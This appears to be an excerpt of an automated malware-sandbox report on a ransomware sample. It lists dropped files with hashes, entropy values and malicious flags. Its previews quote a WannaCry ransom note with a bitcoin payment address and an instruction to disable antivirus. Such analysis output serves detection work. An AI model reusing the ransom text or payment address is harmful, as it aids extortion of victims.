                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1311000
                                Entropy (8bit):7.999870530538717
                                Encrypted:true
                                SSDEEP:24576:6fJUwahcBZ5/gu03f/N5DQi5g4cMb+auw6zWpO9n2+J2gaP4oadlY7tWZI:6R1aOvCfVWi2nM6KJVgaPIqJZ
                                MD5:5B2F4F46CBC059D167D434056A00659C
                                SHA1:D4E43DFE946943D283F98B493EC6EC4B384A0A9F
                                SHA-256:603ADB897C6BB31900AEC1921BA4E3504C8D78FE1886C65E793F7C8BA3904F89
                                SHA-512:410EC9FFD48FA97AA157AEBA7685742462C6755D08C8636F319A5FCBE5687306E22EF48454A8937BCC2B55EA9E3641885911DC0CF9E5199A0B4042B4F43AAF3A
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):25166104
                                Entropy (8bit):7.999993157108892
                                Encrypted:true
                                SSDEEP:786432:+lKAwxehwG/s8dfrp6Ntuox/BH3yJErcx1d:+lKAwxeb6DXbXXQl
                                MD5:DA29D7ECB72B1F4E484805DC2BAAD5E3
                                SHA1:15BD719EC89BA6B2F9FAD4EC650D54CEEF94E7D0
                                SHA-256:7A47247815745913D789584F5176C936F183034927DAF0CCE3EBE940CB3CD4A2
                                SHA-512:38CF676181D6155AB0A4BDE7A40908288B8803C703ACD1C6E67475D77A0C8AEED7BB4D1F91B5AA1E811935046DAFBEAD2E1558749475F150F81A2344D053D27C
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):196888
                                Entropy (8bit):7.999311918909105
                                Encrypted:true
                                SSDEEP:6144:is7Em1JOX8FY7W1r0P2OQ16QlzlTd6muPnk:t7hEXNS1r0PRy6MzlpsPk
                                MD5:25B44E5390DF91FD20765F5B3534E8E4
                                SHA1:AD46AD97963D5F109E09BAA2E6D858BA81AD6C11
                                SHA-256:5DFD0C18B6AB1526491756E359ECE55E61D8E885E7139F8702C4CDB6CD878BB8
                                SHA-512:4D7772DBBB6FEA217065937347545E8D1B89064D77C505D01DE4D75D72C8C64226C9A6C3DDDC80C077EEBEC0718736F97BB318FDE7C75C1E4BD4B6AFB18C9862
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):904
                                Entropy (8bit):7.768206859833943
                                Encrypted:false
                                SSDEEP:24:bkQfmj83tD16G/7e+WiLcqOAHBgUXAeeLVlQP:bkbj4TnjWIcqNh7FeLVGP
                                MD5:DEF595274AB7D0B41B2A30C6355915A3
                                SHA1:AB5A8DFBC8947B71A9E8E7A4B71AF8BD7A7916A4
                                SHA-256:2D9D3DD244DCBE7870392B1DEC06AD25321FB9960D6394873720DF40BCD26456
                                SHA-512:6DC4677E6590A848EB5C470A0621A3ADAAFFD12718A9C012565B167FC428D02AA766A93B21BAFCE9EB92FD47F56B137788C6F532B3EA79BC3FC77CC6530B6230
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):602456
                                Entropy (8bit):7.999712878075342
                                Encrypted:true
                                SSDEEP:12288:1QAiHwGSfGGq/K8K4RPRXrAktO92Fc0R/ibJEZ6OyiPP1:1QHHwDfGGqSUxtjt6O3P9
                                MD5:079839C8DB70CAB086453E27B7860567
                                SHA1:294FA1F11AA5488694A0451E75071942815F10DB
                                SHA-256:503CECCE4BEA587336F7C1BE10B21B4D2DBE37AA6466E0A00E3BE947B9CC48C2
                                SHA-512:A995A1E7A8F06B11AA34C0AA9ABC4012A228DC42067C99F87E24C3A462AD48A37E68EE351E56880010EB40BFA099D1B7963127D0796CC30B0353E1ED2E5C5773
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6344
                                Entropy (8bit):7.9695539682207395
                                Encrypted:false
                                SSDEEP:192:1j8AuaAbjgwLaLvoYOeuD33lHniFSHB/qTjmwPj2MXJ/Gw2cpYFJq:1IDljgNEZFD33FniFShg19/GTYgJq
                                MD5:25FB99FF9D34423D81CEF168162EECF8
                                SHA1:E03576EFA8732BFE9AE661315F0F449418D6DB6F
                                SHA-256:CC3BA82846EF43739E01EC7FE8E44E4730770CB602808FE202976F6FE554A7EC
                                SHA-512:F1E5F806E4AFB745748E79848295798BA118484C2A778DD8096FCEB4CB6C79F35E543D5EFBC134028E72B00AE6F2D84FD03895107709E097A7724213C3E867FE
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2680
                                Entropy (8bit):7.931584328626483
                                Encrypted:false
                                SSDEEP:48:bkvb5V1R8x+z/y5Lm69RanEReO4BEQAuwtK1+hN59mrmhPmLi8ntYdOWAL:oz712oTy5HGUtOEEQK1+/5QChcltYdOV
                                MD5:0D247F0356B0420C5DFAF27F0D9AA456
                                SHA1:60B14962C61CF5AC6CD436CF686F6BA303317C51
                                SHA-256:40446AEABF43FCB792CF0DA5A1C9430A7453CBD47AB61A3DE74D2B73177CDE9F
                                SHA-512:C41A78EDB3296D0E550EE6A595E89C9F97D5C5B3E705EA850C9C83E49534C2E2E9003D84F06E188D337D883E53888F385D6949BD6F20D73A24BC28B246FF72AE
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):728
                                Entropy (8bit):7.67356349573684
                                Encrypted:false
                                SSDEEP:12:bkEQIcBXO2camedIh6JznyEtzNMdjLEYkYl0HZ2dUK8MOz8ZwVwUlT+tntOBLrWV:bkPXOrajdIIJadjL/kw0AdrOjV1N9ZCx
                                MD5:8E93F870633F8F5B7875AC1BEFA3A1C5
                                SHA1:75B66176BADAE114D51744639D85BDE284CBC719
                                SHA-256:368147C008979EC414305C539A66F001A2D031E703644E77FF3DDCF56960192F
                                SHA-512:ED9D05B7E1AF5BCC354C4A3CE955CDC12C7092E683A0803B2B0435BB24A4CADBAB3C2F504636472809981C9C7B2044364CB3B4244529B85C652710E7087EE8AD
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):808
                                Entropy (8bit):7.731787316287654
                                Encrypted:false
                                SSDEEP:24:bkzXroPK2pdYLC73jERZa4my1PIwgfKiOqy9gDJElZEw:bknoPwC7TERM4FCbptS8JEt
                                MD5:171983799A5592EB0872ADE58107ABA4
                                SHA1:60BD3CE3BCFFE09AEF136B339C6C517E00EAE386
                                SHA-256:7EF6FBE8B22ADA15D7FC087A258EA9646A2E35735C7A3F0B100FA880498B61C9
                                SHA-512:4F316AFE9ADFA46B9ADF2BCE4A286C05DCA2B0688546745C71FCA6592441E9EC71998BD1B586B2874468560584CF7F58C4CA2C3C83E5018E1D5AD60D9A0797D9
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):904
                                Entropy (8bit):7.750375763100044
                                Encrypted:false
                                SSDEEP:24:bklXaS+HKMUgnNfHgE6gOPuu4wQF7iHE9aNfZF:bkNaHqTcfHgE6gTieaNf7
                                MD5:B461993C7F6E132473416B8159575650
                                SHA1:9819CECCA62E70CA81801DF5C81EA0E7C3BC2FE1
                                SHA-256:59E94A391054D256E7E1D41B5BEB757B2BC04ED81CC4F0F128470B65A1FF74F4
                                SHA-512:F431E0F47959FC8307507101A2B90A34FA8744639C1D0D555F5D30ADBCADBCA493A37A4F19CBB10D631AD9E25EC9F2566DA8A8926EB2A34634C28796650DA1C5
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):602456
                                Entropy (8bit):7.99967222940526
                                Encrypted:true
                                SSDEEP:12288:yd0F8sxhZFZkUFbR81WLVzWSnk+RVRa+lMiOI6WASUJUXknkII:ysNGWJCPQVlEyRZII
                                MD5:F4DB6F83F6D703F4DFDF32448A0D4875
                                SHA1:0F58B53D7AF3E959EFE2166211ABA211D13D2274
                                SHA-256:CEDBCB1AEDDD0B962E96F43F7E44E9F2398A8B0C046717D21A95ABBE0163209F
                                SHA-512:68E325CFD2FD03C45B460F2497EED3EDFBA84EC2D7D4BE5E95A2DDE6CAF9C36F7378748A9BA294AD5B8AA3CE4A3A0A5ADD4D9BFCC044495D46E70344E8B90CC8
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6344
                                Entropy (8bit):7.9754787145896495
                                Encrypted:false
                                SSDEEP:96:oBt4zOH2CL1EGINmfNInDBlKj1LE7R1Kzf1Mk39y007t9ZtQV8hQPxTSw1QfZLPx:hCL+GINE2DKVE11O9MkvggLQBRpIs9LP
                                MD5:D532598266C6F62D28A9BDBD7F69B475
                                SHA1:913FC21F1652570EDBA0D1D2FA4D3D74521A3A56
                                SHA-256:A5D97B7F8ACDEE1EECD64040C88A74FED7183FAC8277F7672C2E676BDE8F4DA5
                                SHA-512:679558496286040DB43C15B6DCCC3032D58A5674072948DB2F02E776B626E73250A9226A1D3F5E1310933180956765F191C8A0AC6EF72D399848DBD4BA6B2455
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7000
                                Entropy (8bit):7.9724099953514305
                                Encrypted:false
                                SSDEEP:192:tuvAiXVvcSQ6vej+Q4CljqiBUOO7QdNZ2oI:tuvAiXVESf2i2l/BUpcdNZ2oI
                                MD5:066854BE7A95C603A3F56322FAB5AF0D
                                SHA1:017316CA5BBF291D071189A8B080C570EE4DDC91
                                SHA-256:CF02663C8B29425AAD79E34630DFE32429CF1517F13A5CA6FB23A9DFF8D9145B
                                SHA-512:A2B58B673FD1F76D85ADFA81A1EE49F4A263E3B3416EF0A55F0EA9E817E2A2E6A2FA180906575862FB430C2D895E19EF5D35F9977C30AD3C0642CF240855724C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7000
                                Entropy (8bit):7.970189477864432
                                Encrypted:false
                                SSDEEP:192:Yn3L+LZUXc2CHqKzt9OzwYQdXDfAQuElVUzZ8:YnmD2CHqnQ5ll
                                MD5:A8C90DBC139D2144999B27719EBF0F15
                                SHA1:629FF64D81E71F58FCEFA95CC9CE7572A2117453
                                SHA-256:E8E2E583B57B73BF55135FCB8FF0EB87A0F3C10C369EA9F58126B13CE33D0F39
                                SHA-512:346596158AE51F6DD73A09D493F4131A7C3FE2E8BAF8AC52423E004ADF56F9D9C3C287CBD6831F9714EDB3BBF18F397E0C61D288BA2A702B2597CCEEE1EEE3CA
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):917784
                                Entropy (8bit):7.999775460249474
                                Encrypted:true
                                SSDEEP:12288:gwjDV6e/q5o6T5bF4wVgCj+//nKkwCoxpa0AwgdJaVHciT1/yooK49a8hM:gwPV//UR5/VS//KPxpGjan9yD6/
                                MD5:111B53273BBB9FD96E85C1DE41AE66A1
                                SHA1:D7A6C6F5AF7C45E5D343654BB5CCB2FCFD261314
                                SHA-256:02BB09FFC6F2DD083F2875F60649C879FD6F29A4B31DBEDA425D01F19462CEF5
                                SHA-512:6B06BB3FA721277A2E087B29889480FB83F11E3B564FE0A630DA1ED3B8062CCFD156340FFB3EACD0588C356CDB54D4142CE52C5F0B2CAA295257A9830065760F
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):89816
                                Entropy (8bit):7.997885471962823
                                Encrypted:true
                                SSDEEP:1536:MpaK5UiAWqmx5GyhMttzgD77tRq0CVV+GWb9V5qTuKEo:MpaKGAzhMfMBw9otL5muKEo
                                MD5:A9A958E1926E7A8314616502F7BBB54E
                                SHA1:635A86DA35F7696E57D86DBEEA70BBFB8A144ED1
                                SHA-256:46259CD7CAB3A1B4E5896DB57E7F531BD8769C560F6E14632BB3803A4A3BF16C
                                SHA-512:64CEDA6CD58B936136CD7CE646D46FB598E055E29FD917CF2B9584F3C1FF419FABEE66009CEB7E35B15C5D598079A6D0A85B7071EE88A0543E97A13E3B7DCC34
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):516712
                                Entropy (8bit):7.999587931693368
                                Encrypted:true
                                SSDEEP:12288:+fjtxPusI/Novbz4jhREsuZ93gGjkbGK5frqwXVAUSKNuJzceiU:+f7usxvbQGf93djYGErqAi3xJ9iU
                                MD5:4379E8A892DFDF0132DBD460F3DA2DC0
                                SHA1:E677DB57DB795ADDFC59863F14929A15FA9890BA
                                SHA-256:2832B29DEFA7930A8D5FEF300B6C61AE5167D75CCCB1A5AE4BD5A363483474E0
                                SHA-512:7648C040237CEA8926A4AAA5EC07B5E1BEC7F7D83A2B1BFCA689AE3F2D667F879818C2A5832CEAA3B7BFB7A7BAFA82CE0B3AB72CDF6B426930D754BC25CF162D
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16664
                                Entropy (8bit):7.989507536372097
                                Encrypted:false
                                SSDEEP:384:bckPcxNE+y5w8WbJkZIhPTRIgp28PVQZK2Awy5Z:YkUxa+8w8OZBR7pdqUD
                                MD5:AFD6DA67BF3E239E87AE7DC685A2B17D
                                SHA1:856AA374886FF54976E54681FA365681475E7BCF
                                SHA-256:10ED5054B9131068E03E58A8B6CD28344E2A4B1F539ED46D70A9F97875B87C00
                                SHA-512:584DF1AA58097143C217F0907BFE24BA5B9CBAE63FC8CFEC82E64B49817454F43BFAC619B97314214A9E62849C573DD9F2244FB89E3CE7378EF61C68E7F3CC8C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296168
                                Entropy (8bit):7.999421558718213
                                Encrypted:true
                                SSDEEP:6144:x7FELKm9YM4LIRizDgL774WRbhfSI/H+zG3cw8XknrH0uGOxCu:jEl9YysApbhRS0nr/GgCu
                                MD5:BD11B72C279125EC902A5C1243C82005
                                SHA1:0AE111D972C480E7A2CE2FD78702EFEFD5D6BCA4
                                SHA-256:7EAD220502EDB8C3E2A641F721AFDADD7B1D974161A86076766993537387A105
                                SHA-512:47832BF6B6DB87D7172034AF1F9E038340BC2730DFEDF6F0C45D1F84ECD7B8A81D48C3F0CD3B1C87463CA88FB09BAAA258BEFCE1127BC7EEE6C1FB9087406F92
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296392
                                Entropy (8bit):7.999352668087261
                                Encrypted:true
                                SSDEEP:6144:B8sTitjP5rguHBJWKaDF/iO+HpGHwAmiVeOC7dzCCtpP6fE:B8yidRsuhJWAIeOOt3l
                                MD5:E369C0724646C7E74817B626FCC5A1E7
                                SHA1:D2E7E8D27061DEAF9F634FFB3F03A6D32BB610D2
                                SHA-256:33D2718FAB27634DF66B1F199ED8C15221B07CFEDA5E13CE491428778C98B3CC
                                SHA-512:67C5D4D6E29EEE0736043E58971E6396D4AF45AB9988F525CD25210CB8BBB2719BE6775892880EC549843EBC0CE1FDB66ACFA8DF0DC0105422C9780AB8E32630
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1528
                                Entropy (8bit):7.8559999814732775
                                Encrypted:false
                                SSDEEP:24:bkMa+zejvfgVZDyEeMwP7uOuOoHPskPfj5TcnHKdIbRhbQuwhCsVQ:bkMaAejK1lebEBP7mH0IbRhc/fQ
                                MD5:C4EE926DC7C06AE5CF3BA275F0B0D138
                                SHA1:7F6532ED5E26DA6B35F33A25EC85C14BF23D1C87
                                SHA-256:229FC44F25D839FD642EBF34966136425AC3FB5B74592BF7691046458B825087
                                SHA-512:03B088AB520216218CCC4043CA1B6AB663F5AF96E9CBD5809692AD2469838C01C434DA91CBB258BB38DD3987A6059BCC9498EC138AE5B51D1D9E6B0C23A64FE6
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):638136
                                Entropy (8bit):7.999682169727389
                                Encrypted:true
                                SSDEEP:12288:8wzTCwCyotgapEXx/TBr6dSh4RMeuOtGRRQJeSb1hSQhIaIOynhns:8wPCwCy8uhZ6E+RMeupR3AhvOG
                                MD5:ABCCDCF6C3A8E4E02E4FAF2126087DEF
                                SHA1:0F83E968B834802B1C4A2563DC711DD385CD4FD1
                                SHA-256:FD20B520952CEA39F859597C5239D56A7E26E263FC870EBD8272518960FB45CA
                                SHA-512:BC019041F60AADB4BDC41906C4AFD54C3B31744F63C88F3281C5625A4ACC9BF29C511EBB877B31CD00FFE4AC66D0E456BBFA9818933DD5138E3AF58CED644F93
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):84536
                                Entropy (8bit):7.998006341929174
                                Encrypted:true
                                SSDEEP:1536:JgdebyFJHa3tLE3C5ocOvBC5ikAZ/lclhUclF6ZQXSvbj:JBMkLSBC5id/lccclF6ZQXSvX
                                MD5:9D132599CC72B5B6D90016747320CC2C
                                SHA1:C6F32EFFD0B6C133342988F7C886EFA1C45B4232
                                SHA-256:509410A46D5AA2B3799FD3EAD98790DD13259135EC29862A30D07BB6D1ED2AE4
                                SHA-512:98426D8A08545FDE03295DC94F74447E9A2D5808281721B6B3989894E8A3D4D4DADACC6A00400E60A711C48CC4BE084F5E4705DCE7B068EFE9F1DF502C19247E
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):289832
                                Entropy (8bit):7.9994543302104
                                Encrypted:true
                                SSDEEP:6144:ZhH6hIY2p/fBi8Lg9wrlye27nUcZuDzjMbEtnf44V7U:3a+Jp/Ji8sIlye27UcZ0jgeQ4e
                                MD5:18AF952D40126A59E4C9DF662C89F073
                                SHA1:7D0E2A8AB8AB59BF7A4B06BDE3751A485F49A209
                                SHA-256:DA45B62B68CA26AE2AD0A8426AC497926A396DF30D5F4F5B4E9B4A1D43CDC5F9
                                SHA-512:156E3CD0050F4531CA947B1092F3921C404A11BE2CDDD53DB50D419C23CF97C1701F18797B7669EFFD945DE9C5E237D3F728618BB0D0B7081A975AF4E80606A8
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4872
                                Entropy (8bit):7.962334394041198
                                Encrypted:false
                                SSDEEP:96:oafGq/Vu2ikzCGhO/NvedQRNZF1SrMH1pAQJx9DHYM/3fu:zfHw2ikzWFW8N9Sk1JJx5Xu
                                MD5:BB6D06F355755E07E5CB1D72EB5BFFD0
                                SHA1:1824B52AF0E8BFB2A09429533230098E72BB9F44
                                SHA-256:6D6654F872B9A1B654F866BBB9747F739449C0A548B8D002151C20BA31571036
                                SHA-512:0471AE3002362A27D7BC07D400429CC3041BD5E39301F77949820539B56A7DB200966B198521336DD613A0B87925453A35677E75BD68C1BA0778F1232EDF12A5
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
